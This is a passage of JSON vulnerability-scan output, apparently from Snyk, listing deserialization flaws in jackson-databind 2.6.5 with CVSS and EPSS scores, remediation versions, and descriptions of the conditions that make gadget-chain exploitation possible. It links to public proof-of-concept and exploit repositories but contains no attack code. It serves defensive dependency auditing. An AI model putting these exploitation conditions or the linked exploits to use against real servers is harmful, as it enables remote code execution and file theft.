"triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.8.11)", - "[2.9,2.9.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1855", - "title": "GitHub Issue" - }, - { - "url": 
"https://github.com/irsl/jackson-rce-via-spel/", - "title": "PoC Project" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:06.545272Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:58.597489Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:20.686860Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:06.545272Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:58.597489Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). 
This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1855)\n- [PoC Project](https://github.com/irsl/jackson-rce-via-spel/)\n", - "epssDetails": { - "percentile": "0.95701", - "probability": "0.13977", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-17485" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-01-11T11:41:28.547000Z", - "functions_new": [ - { - "version": [ - "[,2.8.11)", - "[2.9,2.9.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": 
"2018-01-10T11:41:28Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-01-22T12:30:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:58.597489Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32044", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Rui Chong" - ], - "semver": { - "vulnerable": [ - "[,2.8.11)", - "[2.9.0,2.9.4)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.8.11", - "2.9.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.8.11)", - "[2.9,2.9.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05", - "title": "GitHub Commit" - }, - 
{ - "url": "https://github.com/FasterXML/jackson-databind/issues/1899", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:48.440088Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:59.857985Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:07.715996Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:48.440088Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:59.857985Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) and [CVE-2017-17485](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043)). 
This is exploitable via two different gadgets that bypass a blacklist.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. 
These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1899)\n", - "epssDetails": { - "percentile": "0.94704", - "probability": "0.09270", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-5968" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-w3f4-3q6j-rh82" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-01-22T15:40:18.105000Z", - "functions_new": [ - { - "version": [ - "[,2.8.11)", - "[2.9,2.9.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-01-18T15:40:18Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", 
- "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-01-23T13:17:24Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:59.857985Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32111", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.5)", - "[2.7.0, 2.8.11.1)", - "[2.9.0, 2.9.5)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.6.7.5", - "2.8.11.1", - "2.9.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.8.11.1)", - "[2.9.0,2.9.5)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1931", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:58.671582Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:49.486075Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.859910Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:58.671582Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:49.486075Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the `c3p0` libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.5, 2.8.11.1, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1931)\n", - "epssDetails": { - "percentile": "0.99133", - "probability": "0.93631", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-7489" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-cggj-fvv3-cqwv" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-02-26T15:13:40.723000Z", - "functions_new": [ - { - "version": [ - "[,2.8.11.1)", - "[2.9.0,2.9.5)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-02-10T15:13:40Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": 
"2018-02-26T15:13:40Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:49.486075Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450207", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.9.1", - "2.8.11.4", - "2.7.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.9, - "functions": [ - { - "version": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2341", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/Al1ex/CVE-2019-12814", - "title": "PoC Repository" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 5.9, - 
"modificationTime": "2024-03-11T09:53:36.647712Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:50.077144Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:15.371549Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:36.647712Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:50.077144Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2341)\n- [PoC Repository](https://github.com/Al1ex/CVE-2019-12814)\n", - "epssDetails": { - "percentile": "0.87218", - "probability": "0.01539", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-12814" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-cmfg-87vq-g5g4" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-06-19T15:28:46.421239Z", - "functions_new": [ - { - "version": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-06-19T14:34:16Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": 
"com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-06-19T14:34:16Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:50.077144Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450917", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "credit": [ - "College of software Nankai University" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.9.9.1", - "2.8.11.4", - "2.7.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable when the feature Polymorphic Type Handling (PTH) is enabled." 
- }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html", - "title": "Debian Security Announcement" - }, - { - "url": "https://github.com/jas502n/CVE-2019-12384", - "title": "Exploit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", - "title": "Github Fix" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2334", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Jackson CVEs Don't Panic - Blog" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x", - "title": "Release Notes" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 5.9, - "modificationTime": "2024-03-11T09:53:36.645685Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": 